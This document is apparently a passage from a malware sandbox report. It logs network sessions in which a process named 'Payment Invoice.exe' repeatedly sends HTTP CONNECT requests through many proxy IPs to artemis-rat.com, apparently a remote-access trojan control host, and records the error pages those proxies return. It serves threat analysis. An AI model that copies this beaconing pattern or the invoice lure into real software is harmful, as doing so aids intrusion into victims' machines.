                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                665192.168.2.451931143.64.8.2180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.057874918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                666192.168.2.45200872.195.34.60273917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.060069084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                667192.168.2.451974103.116.82.13580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.077297926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.823779106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.027007103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.046202898 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                668192.168.2.449800162.241.50.179378767076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.087426901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                669192.168.2.45226043.153.64.664437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.088184118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                670192.168.2.45124143.231.22.229807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.088864088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                671192.168.2.452006203.74.125.1888887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.089385033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.384749889 CET536INHTTP/1.1 502 Bad Gateway
                                                                Server: nginx/1.25.0
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 559
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.0</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                672192.168.2.45226743.153.64.664437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.093287945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                673192.168.2.45226843.153.64.664437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.098526001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                674192.168.2.452005144.76.96.18055667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.102988005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.411499023 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                675192.168.2.451294107.180.88.41625787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.108263016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278500080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379020929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386519909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.386645079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.386126041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:53.440022945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                676192.168.2.45208072.195.34.5841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.119673014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                677192.168.2.451940212.220.13.9841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.120239019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                678192.168.2.45227043.153.64.664437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.121227026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                679192.168.2.451734117.160.250.13088997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.135155916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.664676905 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                Mar 11, 2024 16:15:19.262429953 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                680192.168.2.45197120.219.118.36807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.146737099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.546034098 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                681192.168.2.45203114.103.26.5380007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.146738052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                682192.168.2.4520623.10.93.5031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.149336100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.443080902 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                683192.168.2.45202258.234.116.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.149879932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.465409040 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                684192.168.2.451969109.194.22.6180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.158811092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.026823997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                685192.168.2.452141172.67.182.48807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.159405947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.313646078 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                686192.168.2.452164104.19.138.4807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.166935921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.321455002 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
